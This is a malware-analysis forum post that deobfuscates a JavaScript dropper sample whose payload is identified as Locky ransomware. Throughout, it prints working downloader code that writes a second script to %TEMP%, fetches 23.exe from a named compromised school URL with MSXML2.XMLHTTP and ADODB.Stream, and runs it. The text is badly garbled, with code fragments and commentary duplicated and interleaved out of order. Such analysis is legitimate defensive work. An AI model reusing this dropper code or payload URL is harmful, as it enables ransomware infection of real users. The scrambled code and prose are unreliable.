- May 14, 2016
- 1,597
From malware Vault (samples) :
https://malwaretips.com/threads/10-10-2016-5.64335/
Thanks to @Daniel Hidalgo
details_eyrgV.js
4/56 when posting
Antivirus scan for b8551f47835abb556205e67aaefd4ad07a2a0a638dc937cc3b91fc5d971dff6f at 2016-10-10 20:39:49 UTC - VirusTotal
1) What it looks like :
2) Quick analysis :
4) Deobfuscation of YAydz.js :
https://malwaretips.com/threads/10-10-2016-5.64335/
Thanks to @Daniel Hidalgo
details_eyrgV.js
4/56 when posting
Antivirus scan for b8551f47835abb556205e67aaefd4ad07a2a0a638dc937cc3b91fc5d971dff6f at 2016-10-10 20:39:49 UTC - VirusTotal
1) What it looks like :
var XszHCayO = new Date();
while (true) {
var BxrDqFDU = "j}n<L}^olLe<!<ryk<X}hy45'ktupy4hniy5<gj}n<Sel]TR<!<ryk<X}hy45'j}n<m~vOisr<!
...
...
VT{ID'KVviE775gyRks7!PsmOYVJE2t}n]h4Q}ht2zpssn4Q}ht2n}rxsq456PsmOYVJE2pyr{ht55'anyhinr<yRks'azirhusr<RNxNT~OfnPJkuo4oJFDRZtKrRflix5<gnyhinr<ryk<]hujyDS~vyh4oJFDRZtKrRflix5'a";
ndGoMrN = QUJzuD(BxrDqFDU);
var rABFFQow, udlqE, OFfXHrC;
DimQHsOv = 'WScript.Shell';
OFfXHrC = WScript.CreateObject(DimQHsOv);
rABFFQow = new ActiveXObject('Scripting.FileSystemObject');
udlqE = rABFFQow.OpenTextFile(OFfXHrC.ExpandEnvironmentStrings('%T' + 'MP%') + String.fromCharCode(92) + 'YAydz.js', 2, true);
udlqE.Write(ndGoMrN);
udlqE.Close();
OFfXHrC.run(OFfXHrC.ExpandEnvironmentStrings('%T' + 'M' + 'P%') + String.fromCharCode(92) + 'YAydz.js', 0x1, 0x0);
function QUJzuD(cmDIoyF) {
function MTizWw(UFfwuQh) {
function luauVFis(EuKqPkWb, DGftJFg) {
while (true) {
var jLvbGowH = new Date();
var WuIbnd = new Date(jLvbGowH.getTime() - XszHCayO.getTime());
if (WuIbnd.getSeconds() > 6) {
WScript.Sleep(500);
}var WuIbnd = new Date(jLvbGowH.getTime() - XszHCayO.getTime());
if (WuIbnd.getSeconds() > 6) {
break;
}WScript.Sleep(500);
var BxrDqFDU = "j}n<L}^olLe<!<ryk<X}hy45'ktupy4hniy5<gj}n<Sel]TR<!<ryk<X}hy45'j}n<m~vOisr<!
...
...
VT{ID'KVviE775gyRks7!PsmOYVJE2t}n]h4Q}ht2zpssn4Q}ht2n}rxsq456PsmOYVJE2pyr{ht55'anyhinr<yRks'azirhusr<RNxNT~OfnPJkuo4oJFDRZtKrRflix5<gnyhinr<ryk<]hujyDS~vyh4oJFDRZtKrRflix5'a";
ndGoMrN = QUJzuD(BxrDqFDU);
var rABFFQow, udlqE, OFfXHrC;
DimQHsOv = 'WScript.Shell';
OFfXHrC = WScript.CreateObject(DimQHsOv);
rABFFQow = new ActiveXObject('Scripting.FileSystemObject');
udlqE = rABFFQow.OpenTextFile(OFfXHrC.ExpandEnvironmentStrings('%T' + 'MP%') + String.fromCharCode(92) + 'YAydz.js', 2, true);
udlqE.Write(ndGoMrN);
udlqE.Close();
OFfXHrC.run(OFfXHrC.ExpandEnvironmentStrings('%T' + 'M' + 'P%') + String.fromCharCode(92) + 'YAydz.js', 0x1, 0x0);
function QUJzuD(cmDIoyF) {
var ePqNkIe = '2' + '8';
var WXifTe = '"' + new Date() + '"';
var UYqmNGk = "bPnHVkXJPq" + "emZmyVLKoFFzOljGMsAzP" + "VazuhDqPWcHIELNyrhQBYdfycRcriVoJctmpUdzIXfxEfuEcviDfiIDLtojnpdDIANPfohpHmRzfzZtCdULRGOnlrzam....
...
CfDXXYLOXiNQxaCpfTtqnUefzISQCpigpIxXjryYrCXheQWnGYcjNISGUBtwQnCwyZHhuUaHXdUlRCkpWiYrgxKM";
var oYBnsPCJ = 0;
while (oYBnsPCJ < cmDIoyF.length) {
return WXifTe;
}var WXifTe = '"' + new Date() + '"';
var UYqmNGk = "bPnHVkXJPq" + "emZmyVLKoFFzOljGMsAzP" + "VazuhDqPWcHIELNyrhQBYdfycRcriVoJctmpUdzIXfxEfuEcviDfiIDLtojnpdDIANPfohpHmRzfzZtCdULRGOnlrzam....
...
CfDXXYLOXiNQxaCpfTtqnUefzISQCpigpIxXjryYrCXheQWnGYcjNISGUBtwQnCwyZHhuUaHXdUlRCkpWiYrgxKM";
var oYBnsPCJ = 0;
while (oYBnsPCJ < cmDIoyF.length) {
WXifTe += MTizWw(ePqNkIe ^ luauVFis(cmDIoyF, oYBnsPCJ));
oYBnsPCJ++;
}oYBnsPCJ++;
return WXifTe;
function MTizWw(UFfwuQh) {
return String.fromCharCode(UFfwuQh);
}function luauVFis(EuKqPkWb, DGftJFg) {
return EuKqPkWb.charCodeAt(DGftJFg)
}2) Quick analysis :
2-1) Timer :
3) YAydz.js :var XszHCayO = new Date();
while (true) {
}
while (true) {
var jLvbGowH = new Date();
var WuIbnd = new Date(jLvbGowH.getTime() - XszHCayO.getTime());
if (WuIbnd.getSeconds() > 6) {
var WuIbnd = new Date(jLvbGowH.getTime() - XszHCayO.getTime());
if (WuIbnd.getSeconds() > 6) {
break;
}
wait 7 s before running the next part
2-2) vars that hide some data :var BxrDqFDU
var UYqmNGk
2-3) functions :var UYqmNGk
- QUJzuD(a_string_to_decode)
2-4) Some important objects / parts:=> decode the BxrDqFDU string
=> here, UYqmNGk seems not to be used
- MTizWw(index)=> here, UYqmNGk seems not to be used
=> fromCharCode(index)
- luauVFis(a_string, index)
=> a_string.charCodeAt(index)
var rABFFQow, udlqE, OFfXHrC;
DimQHsOv = 'WScript.Shell';
OFfXHrC = WScript.CreateObject(DimQHsOv);
OFfXHrC.run(OFfXHrC.ExpandEnvironmentStrings('%T' + 'M' + 'P%') + String.fromCharCode(92) + 'YAydz.js', 0x1, 0x0);
DimQHsOv = 'WScript.Shell';
OFfXHrC = WScript.CreateObject(DimQHsOv);
=> object Shell
rABFFQow = new ActiveXObject('Scripting.FileSystemObject');
=> object FileSystemObject
udlqE = rABFFQow.OpenTextFile(OFfXHrC.ExpandEnvironmentStrings('%T' + 'MP%') + String.fromCharCode(92) + 'YAydz.js', 2, true);
=> String.fromCharCode(92) => char \
=> Open a file as text from the location : %TEMP%\YAydz.js'
udlqE.Write(ndGoMrN);=> Open a file as text from the location : %TEMP%\YAydz.js'
parameter 2 : for writing
parameter true : opens the file as Unicode
parameter true : opens the file as Unicode
=> write the real part of new js file in : YAydz.js
(remember that ndGoMrN is a var with the "decrypted" string
udlqE.Close();(remember that ndGoMrN is a var with the "decrypted" string
OFfXHrC.run(OFfXHrC.ExpandEnvironmentStrings('%T' + 'M' + 'P%') + String.fromCharCode(92) + 'YAydz.js', 0x1, 0x0);
=> the new js script YAydz.js is run
Calling the QUJzuD function with the obfuscated vars BxrDqFDU (see above a part of the content) gave me the real content that is put in the new js script
This script also have obfuscated parts as you can see on the spoiler below
What we can already see, easily :
- URL used to download the bad file : http ://lcbschool2.ac.th/pic/_notes/logs.php
- Payload : 23.exe
This script also have obfuscated parts as you can see on the spoiler below
I modified some part , as usual, to avoid some "copy-paste", "save" => infection Tue Oct 11 00: 58: 17 UTC + 0200 2016
var PaBspPy = new Date();
while (true) {
function NBAodwsiLg(Ciefjzar, STRpHAuVjgbK) {
/*GxIKdgKHbXRhdGxJqtskrVVknyXGHNQYEatiKVXLeLuEpgclytMFihRkzKjZcLfwWxxALEEIAtqTVBaGZmATsniegOPmSCNPHNVLfhEzqVGdTOsVUZIbWmSRfNOsamPaMXMPSDYjAqpfmWeeiGjcUfVyzEhrCQkfkaXNaSLMdErcYWjgQfdXkRsZlqTkyoZebWBEAbRjZN*/
JUCrdtgehFJVs();
var maGZS = ["http ://lcbschool2.ac.th/pic/_notes/logs.php"];
var atjq = 362 - 362;
while (true) {
function MjnZz(ranvqXxw, KQVdE, RznDKByMGT) {
function zUEI(AObIuR, gIHhfCj) {
function PednY(ZuFfvwAc, sMKgnw, vkeetFrRO) {
function JUCrdtgehFJVs() { /*BXFGoKwgCD().Sleep(3431-850);*/ }
function UJKNDhc() {
function vxBB(znjEdk) {
function XlMajTFT(KBnCTHPmC) {
function kPHcIta(lZgc, wIgZz) {
function BXFGoKwgCD() {
function HYAOvNTfV(eOQHbx) {
function gLdF(CHvXDVM, QoNTkoU) {
CHvXDVM.saveToFile(QoNTkoU, 2);
}
function hBICuPa(wZzwN) {
wZzwN.close();
}
function QfTXccy() {
function jtHnXesK(JHgUX) {
function NRdRHbSzrLVwis(sVZXNFhWnNzpud) {
var PaBspPy = new Date();
while (true) {
var OcypAHN = new Date();
var qbjSuon = new Date(OcypAHN.getTime() - PaBspPy.getTime());
if (qbjSuon.getSeconds() > 5) {
WScript.Sleep(500);
}var qbjSuon = new Date(OcypAHN.getTime() - PaBspPy.getTime());
if (qbjSuon.getSeconds() > 5) {
break;
}WScript.Sleep(500);
function NBAodwsiLg(Ciefjzar, STRpHAuVjgbK) {
aUwoWNL = 0x1;
LrdyTFn = 0x0;
Ciefjzar.Run(STRpHAuVjgbK, aUwoWNL, LrdyTFn);
}LrdyTFn = 0x0;
Ciefjzar.Run(STRpHAuVjgbK, aUwoWNL, LrdyTFn);
JUCrdtgehFJVs();
var maGZS = ["http ://lcbschool2.ac.th/pic/_notes/logs.php"];
var atjq = 362 - 362;
while (true) {
if (maGZS.length <= 553 - 553) break;
var RwQU = QfTXccy() % maGZS.length;
var InnRbGOcN = maGZS[RwQU];
var qLQpX = QfTXccy();
var xHooWxtNky = '23.exe';
var HyOrvCT = '23.exe';
var MCMJvfnb = 794 - 793;
var tsUuHCfxc = function() {
var HyOrvCT = wQklCQ(tsUuHCfxc) + String.fromCharCode(92) + HyOrvCT;
var jSerZ = function() {
zUEI(InnRbGOcN, jSerZ);
if (jSerZ.status == 100 + 100) {
var rApODBCFzQmM = MjnZz(hOYBosi, jSerZ.ResponseBody, HyOrvCT);
}
try {
atjq++;
maGZS.splice(RwQU, 220 - 219);
}var RwQU = QfTXccy() % maGZS.length;
var InnRbGOcN = maGZS[RwQU];
var qLQpX = QfTXccy();
var xHooWxtNky = '23.exe';
var HyOrvCT = '23.exe';
var MCMJvfnb = 794 - 793;
var tsUuHCfxc = function() {
return new ActiveXObject(PednY('WS&beQBjVFim&cript&beQBjVFim&.She&l&l', [0, 2, 4, 5, 6], '&'));
}();var HyOrvCT = wQklCQ(tsUuHCfxc) + String.fromCharCode(92) + HyOrvCT;
var jSerZ = function() {
return new ActiveXObject(PednY('MSX&ZvPfDkuht&ML2.XM&zDRAyihCSBC&LHTTP', [0, 2, 4], '&'));
}();zUEI(InnRbGOcN, jSerZ);
if (jSerZ.status == 100 + 100) {
var hOYBosi = function() {
return new ActiveXObject(PednY('ADO&DB&EUBbmpybD&.&nlAkBfYkp&Stream', [0, 1, 3, 5], '&'));
}();return new ActiveXObject(PednY('ADO&DB&EUBbmpybD&.&nlAkBfYkp&Stream', [0, 1, 3, 5], '&'));
var rApODBCFzQmM = MjnZz(hOYBosi, jSerZ.ResponseBody, HyOrvCT);
}
try {
NBAodwsiLg(tsUuHCfxc, HyOrvCT);
var tzDwPJI = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \\'
'+xHooWxtNky+'\\
'');
if (tzDwPJI.Count >= 1) {
break;
}
} catch (e) {}var tzDwPJI = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \\'
'+xHooWxtNky+'\\
'');
if (tzDwPJI.Count >= 1) {
break;
}
atjq++;
maGZS.splice(RwQU, 220 - 219);
function wQklCQ(sWvBtu) {var MevmLzbS = ["ExpandEnvironmentStrings"];
return sWvBtu[MevmLzbS[0]]('%TMP%')
}return sWvBtu[MevmLzbS[0]]('%TMP%')
function MjnZz(ranvqXxw, KQVdE, RznDKByMGT) {
try {
}ranvqXxw.open();
XlMajTFT(ranvqXxw);
kPHcIta(ranvqXxw, KQVdE);
HYAOvNTfV(ranvqXxw);
gLdF(ranvqXxw, RznDKByMGT);
JLsTtDfs = ranvqXxw.size;
hBICuPa(ranvqXxw);
return JLsTtDfs;
} catch (e) {}XlMajTFT(ranvqXxw);
kPHcIta(ranvqXxw, KQVdE);
HYAOvNTfV(ranvqXxw);
gLdF(ranvqXxw, RznDKByMGT);
JLsTtDfs = ranvqXxw.size;
hBICuPa(ranvqXxw);
return JLsTtDfs;
function zUEI(AObIuR, gIHhfCj) {
try {
}pKGA = 'G*ugOEbfqTpR*E*T*esPcxzFXmmrp'.split('*');
gIHhfCj.open(pKGA[0] + pKGA[2] + pKGA[3], AObIuR, false);
gIHhfCj.setRequestHeader("User-Agent", "Python-urllib/3.1");
gIHhfCj.send();
} catch (e) {}gIHhfCj.open(pKGA[0] + pKGA[2] + pKGA[3], AObIuR, false);
gIHhfCj.setRequestHeader("User-Agent", "Python-urllib/3.1");
gIHhfCj.send();
function PednY(ZuFfvwAc, sMKgnw, vkeetFrRO) {
OITsX = ZuFfvwAc.split(vkeetFrRO);
kQNJaQj = 'qAV';
for (jXlrputp = 0; jXlrputp < sMKgnw.length; jXlrputp++) {
return kQNJaQj.substring(3, kQNJaQj.length);
}kQNJaQj = 'qAV';
for (jXlrputp = 0; jXlrputp < sMKgnw.length; jXlrputp++) {
kQNJaQj += OITsX[sMKgnw[jXlrputp]];
}return kQNJaQj.substring(3, kQNJaQj.length);
function JUCrdtgehFJVs() { /*BXFGoKwgCD().Sleep(3431-850);*/ }
function UJKNDhc() {
var IZlKZJ = ["random"];
return Math[IZlKZJ[0]]()
}return Math[IZlKZJ[0]]()
function vxBB(znjEdk) {
znjEdk.open();
}function XlMajTFT(KBnCTHPmC) {
KBnCTHPmC.type = 1;
}function kPHcIta(lZgc, wIgZz) {
lZgc.write(wIgZz);
}function BXFGoKwgCD() {
return /*ujUqQoxgBsPMUVbsMVLKwQZaPEvZjJfSxfGqVqfGvngyrwNdzOHilOQXtvWiqhbaTVMltlhZJbQdhQUIFBWztHcNrgQkQxrcIElYlaBmr*/ WScript;
}function HYAOvNTfV(eOQHbx) {
var ODlFrgLxqq = [];
eOQHbx.position = ODlFrgLxqq.length * (636299 - 224);
}eOQHbx.position = ODlFrgLxqq.length * (636299 - 224);
function gLdF(CHvXDVM, QoNTkoU) {
CHvXDVM.saveToFile(QoNTkoU, 2);
}
function hBICuPa(wZzwN) {
wZzwN.close();
}
function QfTXccy() {
var UkDb = 99999 + 1;
var AlmnhE = 100;
return Math.round(UJKNDhc() * (UkDb - AlmnhE) + AlmnhE);
}var AlmnhE = 100;
return Math.round(UJKNDhc() * (UkDb - AlmnhE) + AlmnhE);
function jtHnXesK(JHgUX) {
var LoqSEJVY = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz';
for (var WJjuY = 0; WJjuY < JHgUX; WJjuY++) {
ecNwo += LoqSEJVY.charAt(Math.floor(Math.random() * LoqSEJVY.length));
}
return ecNwo;
}for (var WJjuY = 0; WJjuY < JHgUX; WJjuY++) {
ecNwo += LoqSEJVY.charAt(Math.floor(Math.random() * LoqSEJVY.length));
}
return ecNwo;
function NRdRHbSzrLVwis(sVZXNFhWnNzpud) {
return new ActiveXObject(sVZXNFhWnNzpud);
}What we can already see, easily :
- URL used to download the bad file : http ://lcbschool2.ac.th/pic/_notes/logs.php
- Payload : 23.exe
4) Deobfuscation of YAydz.js :
4-1) Timer :
5) To summarize :var PaBspPy = new Date();
while (true) {
=> wait 6 seconds
while (true) {
var OcypAHN = new Date();
var qbjSuon = new Date(OcypAHN.getTime() - PaBspPy.getTime());
if (qbjSuon.getSeconds() > 5) {
WScript.Sleep(500);
}var qbjSuon = new Date(OcypAHN.getTime() - PaBspPy.getTime());
if (qbjSuon.getSeconds() > 5) {
break;
}WScript.Sleep(500);
=> wait 6 seconds
4-2 ) Main loop :JUCrdtgehFJVs();
var maGZS = ["http ://lcbschool2.ac.th/pic/_notes/logs.php"];
var atjq = 362 - 362;
This is the main loop, that will use some useful or useless functions/vars
while (true) {
var maGZS = ["http ://lcbschool2.ac.th/pic/_notes/logs.php"];
var atjq = 362 - 362;
This is the main loop, that will use some useful or useless functions/vars
while (true) {
if (maGZS.length <= 553 - 553) break;
var HyOrvCT = wQklCQ(tsUuHCfxc) + String.fromCharCode(92) + HyOrvCT;
var jSerZ = function() {
zUEI(InnRbGOcN, jSerZ);
if (jSerZ.status == 100 + 100) {
var rApODBCFzQmM = MjnZz(hOYBosi, jSerZ.ResponseBody, HyOrvCT);
}
try {
atjq++;
maGZS.splice(RwQU, 220 - 219);
}var RwQU = QfTXccy() % maGZS.length;
var InnRbGOcN = maGZS[RwQU];
var qLQpX = QfTXccy();
var xHooWxtNky = '23.exe';
var HyOrvCT = '23.exe';
var MCMJvfnb = 794 - 793;
var tsUuHCfxc = function() {var InnRbGOcN = maGZS[RwQU];
var qLQpX = QfTXccy();
var xHooWxtNky = '23.exe';
var HyOrvCT = '23.exe';
var MCMJvfnb = 794 - 793;
return new ActiveXObject(PednY('WS&beQBjVFim&cript&beQBjVFim&.She&l&l', [0, 2, 4, 5, 6], '&'));
}();var HyOrvCT = wQklCQ(tsUuHCfxc) + String.fromCharCode(92) + HyOrvCT;
var jSerZ = function() {
return new ActiveXObject(PednY('MSX&ZvPfDkuht&ML2.XM&zDRAyihCSBC&LHTTP', [0, 2, 4], '&'));
}();zUEI(InnRbGOcN, jSerZ);
if (jSerZ.status == 100 + 100) {
var hOYBosi = function() {
return new ActiveXObject(PednY('ADO&DB&EUBbmpybD&.&nlAkBfYkp&Stream', [0, 1, 3, 5], '&'));
}();return new ActiveXObject(PednY('ADO&DB&EUBbmpybD&.&nlAkBfYkp&Stream', [0, 1, 3, 5], '&'));
var rApODBCFzQmM = MjnZz(hOYBosi, jSerZ.ResponseBody, HyOrvCT);
}
try {
NBAodwsiLg(tsUuHCfxc, HyOrvCT);
var tzDwPJI = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \\' '+xHooWxtNky+'\\'');
if (tzDwPJI.Count >= 1) {
} catch (e) {}var tzDwPJI = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery('Select * from Win32_Process Where Name = \\' '+xHooWxtNky+'\\'');
if (tzDwPJI.Count >= 1) {
break;
}atjq++;
maGZS.splice(RwQU, 220 - 219);
4-3) Object created : method used to obfuscated them :A very important function used :
But we will see that it is, hum, a "lol" function (but good enough to make its job)
Let see the different calls to this function :
return new ActiveXObject(PednY('WS&beQBjVFim&cript&beQBjVFim&.She&l&l', [0, 2, 4, 5, 6], '&'));
4-4) Deobfuscation :function PednY(ZuFfvwAc, sMKgnw, vkeetFrRO) {
It is the main function to "deobuscated" the string where when objects have to bee used.OITsX = ZuFfvwAc.split(vkeetFrRO);
kQNJaQj = 'qAV';
for (jXlrputp = 0; jXlrputp < sMKgnw.length; jXlrputp++) {
kQNJaQj += OITsX[sMKgnw[jXlrputp]];
}
return kQNJaQj.substring(3, kQNJaQj.length);
}kQNJaQj = 'qAV';
for (jXlrputp = 0; jXlrputp < sMKgnw.length; jXlrputp++) {
kQNJaQj += OITsX[sMKgnw[jXlrputp]];
}
return kQNJaQj.substring(3, kQNJaQj.length);
But we will see that it is, hum, a "lol" function (but good enough to make its job
)Let see the different calls to this function :
return new ActiveXObject(PednY('WS&beQBjVFim&cript&beQBjVFim&.She&l&l', [0, 2, 4, 5, 6], '&'));
- PednY('WS&beQBjVFim&cript&beQBjVFim&.She&l&l', [0, 2, 4, 5, 6], '&'));
and return a string build with parts given as first parameter array
return new ActiveXObject(PednY('MSX&ZvPfDkuht&ML2.XM&zDRAyihCSBC&LHTTP', [0, 2, 4], '&'));
Here, the function cuts the string in parts separated by '&' (second parameter)and return a string build with parts given as first parameter array
- PednY('WS&beQBjVFim&cript&beQBjVFim&.She&l&l', [0, 2, 4, 5, 6], '&'));=> 0 => WS
=> 2 => cript
=> 4 => .She
=> 5 => l
=> 6 => l
=> "WScript.Shell"
- in function PednY :=> 2 => cript
=> 4 => .She
=> 5 => l
=> 6 => l
=> "WScript.Shell"
kQNJaQj = 'qAV';
=> useless 3 chars added
kQNJaQj.substring(3, kQNJaQj.length);
=> useless 3 chars removed
=> useless 3 chars added
kQNJaQj.substring(3, kQNJaQj.length);
=> useless 3 chars removed
- PednY('MSX&ZvPfDkuht&ML2.XM&zDRAyihCSBC&LHTTP', [0, 2, 4], '&'));
return new ActiveXObject(PednY('ADO&DB&EUBbmpybD&.&nlAkBfYkp&Stream', [0, 1, 3, 5], '&'));
=> "MSXML2.XMLHTTP"
- PednY('ADO&DB&EUBbmpybD&.&nlAkBfYkp&Stream', [0, 1, 3, 5], '&'));
=> "ADODB.Stream"
JUCrdtgehFJVs();
=> to obfuscate a bit more => useless
var maGZS = ["http ://lcbschool2.ac.th/pic/_notes/logs.php"];
=> array of url
var atjq = 362 - 362; => 0
while (true) {if (maGZS.length <= 0) break;
var InnRbGOcN = maGZS[RwQU];
var HyOrvCT = '23.exe';
var MCMJvfnb = 794 - 793; => 1
var tsUuHCfxc = function() {
try {
atjq++;
}=> break if no URLS left in the array of URLs maGZS
var RwQU = QfTXccy() % maGZS.length;
=> RwQU : a random valid index of the array of URLs
function QfTXccy() {
function UJKNDhc() {
var UkDb = 99999 + 1;
var AlmnhE = 100;
return Math.round(UJKNDhc() * (UkDb - AlmnhE) + AlmnhE);
}var AlmnhE = 100;
return Math.round(UJKNDhc() * (UkDb - AlmnhE) + AlmnhE);
function UJKNDhc() {
var IZlKZJ = ["random"];
return Math[IZlKZJ[0]]()
}return Math[IZlKZJ[0]]()
var InnRbGOcN = maGZS[RwQU];
=> retrieve the URL corresponding in the array (here, only one URL available)
=> we will see at the end of the loop that the current URL used is remove from the array of URLs
var qLQpX = QfTXccy();=> we will see at the end of the loop that the current URL used is remove from the array of URLs
=> maGZS.splice(RwQU, 220 - 219);
=> maGZS.splice(index_used, 1);
=> maGZS.splice(index_used, 1);
=> useless
-------------------------------------------------------------------------------------------------------------
=> in this sample, there is only one URL, but the script is
made to take into account multiple URLs, if available
----------------------------------------------------------------------------------------------------------------
var xHooWxtNky = '23.exe'; => the payload name=> in this sample, there is only one URL, but the script is
made to take into account multiple URLs, if available
----------------------------------------------------------------------------------------------------------------
var HyOrvCT = '23.exe';
var MCMJvfnb = 794 - 793; => 1
var tsUuHCfxc = function() {
return new ActiveXObject(PednY('WS&beQBjVFim&cript&beQBjVFim&.She&l&l', [0, 2, 4, 5, 6], '&'));
}();=> tsUuHCfxc : object shell from "WScript.Shell"
var HyOrvCT = wQklCQ(tsUuHCfxc) + String.fromCharCode(92) + HyOrvCT;
function wQklCQ(sWvBtu) {
var MevmLzbS = ["ExpandEnvironmentStrings"];
return sWvBtu[MevmLzbS[0]]('%TMP%')
}
var MevmLzbS = ["ExpandEnvironmentStrings"];
return sWvBtu[MevmLzbS[0]]('%TMP%')
}
=> HyOrvCT : "%TEMP%\23.exe"
var jSerZ = function() {
return new ActiveXObject(PednY('MSX&ZvPfDkuht&ML2.XM&zDRAyihCSBC&LHTTP', [0, 2, 4], '&'));
}();=> jSerZ : object http from "MSXML2.XMLHTTP"
zUEI(InnRbGOcN, jSerZ);
function zUEI(AObIuR, gIHhfCj) {
try {
}pKGA = 'G*ugOEbfqTpR*E*T*esPcxzFXmmrp'.split('*');
gIHhfCj.open(pKGA[0] + pKGA[2] + pKGA[3], AObIuR, false);
gIHhfCj.send();
} catch (e) {}gIHhfCj.open(pKGA[0] + pKGA[2] + pKGA[3], AObIuR, false);
=> open a connection with "GET", URL, false
=> URL : "http ://lcbschool2.ac.th/pic/_notes/logs.php"
gIHhfCj.setRequestHeader("User-Agent", "Python-urllib/3.1");=> URL : "http ://lcbschool2.ac.th/pic/_notes/logs.php"
gIHhfCj.send();
=> http request "GET" to "http ://lcbschool2.ac.th/pic/_notes/logs.php" with header "User-Agent", "Python-urllib/3.1"
if (jSerZ.status == 100 + 100) {
=> 200 : status "OK" => request successful
var rApODBCFzQmM = MjnZz(hOYBosi, jSerZ.ResponseBody, HyOrvCT);
}
var hOYBosi = function() {return new ActiveXObject(PednY('ADO&DB&EUBbmpybD&.&nlAkBfYkp&Stream', [0, 1, 3, 5], '&'));
=> object Stream from "ADOD.Stream"
}();=> object Stream from "ADOD.Stream"
var rApODBCFzQmM = MjnZz(hOYBosi, jSerZ.ResponseBody, HyOrvCT);
function MjnZz(ranvqXxw, KQVdE, RznDKByMGT) {
}
try {
ranvqXxw.open();
hBICuPa(ranvqXxw);
} catch (e) {}ranvqXxw.open();
=> open a Stream
XlMajTFT(ranvqXxw);
=> stream.type = 1
kPHcIta(ranvqXxw, KQVdE);
=> stream.write from ResponseBody to Stream
HYAOvNTfV(ranvqXxw);
=> stream.position = 0
gLdF(ranvqXxw, RznDKByMGT);
=>stream.saveToFile(HyOrvCT, 2);
=> "%TEMP%\23.exe" and 2 : create /overwrite the file
JLsTtDfs = ranvqXxw.size;=> "%TEMP%\23.exe" and 2 : create /overwrite the file
hBICuPa(ranvqXxw);
=> stream.close()
return JLsTtDfs;
=> return the size
}
=> From ResponseBody to file "%TEMP%\23.exe"
=> rApODBCFzQmM : size
=> rApODBCFzQmM : size
try {
NBAodwsiLg(tsUuHCfxc, HyOrvCT);
if (tzDwPJI.Count >= 1) {
} catch (e) {}
function NBAodwsiLg(Ciefjzar, STRpHAuVjgbK) {
aUwoWNL = 0x1;
LrdyTFn = 0x0;
Ciefjzar.Run(STRpHAuVjgbK, aUwoWNL, LrdyTFn);
}LrdyTFn = 0x0;
Ciefjzar.Run(STRpHAuVjgbK, aUwoWNL, LrdyTFn);
=> try to run the Payload
var tzDwPJI = GetObject('winmgmts:{impersonationLevel=impersonate}').ExecQuery("Select * from Win32_Process Where Name = " + xHooWxtNky);
=> looks if the payload is runningif (tzDwPJI.Count >= 1) {
break;
=> at least one process of 23.exe => exit
}=> at least one process of 23.exe => exit
atjq++;
=> no used
maGZS.splice(RwQU, 220 - 219);
=> removes completely the object on index RwQU (URL used in the actual loop)
=> size of array -1
=> here, only one URL => maGZS will be empty, and in the next loop make the script stops
=> size of array -1
=> here, only one URL => maGZS will be empty, and in the next loop make the script stops
- A first script is used to create a second script in %TEMP%\YAydz.js,
- YAydz.js is run
- YAydz.js is run
- requests url "http ://lcbschool2.ac.th/pic/_notes/logs.php"
- and save the payload to "%TEMP%\23.exe"
- try to run the payload
- quit the script if the payload is already running or if url array empty
=> here, only one URL => one try
- and save the payload to "%TEMP%\23.exe"
- try to run the payload
- quit the script if the payload is already running or if url array empty
=> here, only one URL => one try
Payload :
A locky ransomware
Last edited:
